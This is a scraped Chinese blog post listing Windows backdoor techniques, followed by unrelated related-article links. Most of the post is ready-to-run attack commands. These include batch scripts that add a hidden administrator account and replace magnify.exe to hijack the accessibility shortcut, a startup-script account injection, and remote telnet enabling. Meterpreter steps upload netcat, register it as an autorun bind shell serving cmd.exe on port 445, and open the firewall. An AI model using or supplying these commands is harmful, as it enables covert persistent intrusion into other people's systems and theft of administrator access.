zoukankan      html  css  js  c++  java
  • Windows后门小计

    嗅探欺骗:



    在目标机上安装嗅探工具窃取管理员的密码

    放大镜替换:


     

    构造批处理:

      @echo off
      net user gslw$ test168 /add
      net localgroup administrators gslw$ /add
      %Windir%system32 agnify.exe
      exit
    转换exe文件:
    battoexe等工具
    文件替换:
      @echo off
      copy %Windir%system32dllcachemagnify.exe nagnify.exe
      copy %Windir%system32magnify.exe nagnify.exe
      replace.exe %Windir%magnify.exe %Windir%system32dllcache
      replace.exe %Windir%magnify.exe %Windir%system32
      exit
    后门利用:
    Win+U启动辅助工具项,打开放大镜即可

    组策略欺骗:



    在windows开关机启动脚本中做手脚:
    @echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit

    telnet利用:



    远程改端口:“tlntadmn config \192.168.1.9 port=800 -u gslw -p test168 ”
    在目标机开启:
    tlntadmn config port=2233 //修改 telnet默认端口
    sc config tlntsvr start= auto //设置启动类型为自启动
    net start telnet //开启telnet服务项
    tlntadmn config sec =passwd //设置密码
    tlntadmn config port = 800 //设置端口
    远程登陆:telnet 192.168.1.9 800 //键入账号密码即可连接

    msf(Netcat.exe):



    上传到目标系统:meterpreter > upload /usr/share/windows-binaries/nc.exe C:\windows\system32
    查看自启:meterpreter > reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
    设置自启:meterpreter > reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:windowssystem32 c.exe -Ldp 445 -e cmd.exe'
    检查确认:meterpreter > reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
    打开cmd :meterpreter > execute -f cmd -i
    开放445端口:netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
    检查是配置:netsh firewall show portopening
    后门使用:nc -v 172.16.104.128 445

  • 相关阅读:
    Spring Cloud(三):Web服务客户端之Feign
    Spring Cloud(二):Web服务客户端之Ribbon
    Spring Cloud(一):服务注册中心Eureka
    细说Ansible主机清单inventory
    Ansible配置文件ansible.cfg详解
    CentOS 7离线安装Ansible
    Java中的异常处理
    PyQt5Day33--自定义信号+动画
    8. matlab图像处理基础——边缘检测+形态学变换+图像增强
    7. matlab图像处理基础——几何变换+正交变换
  • 原文地址:https://www.cnblogs.com/feiyucha/p/9903588.html
Copyright © 2011-2022 走看看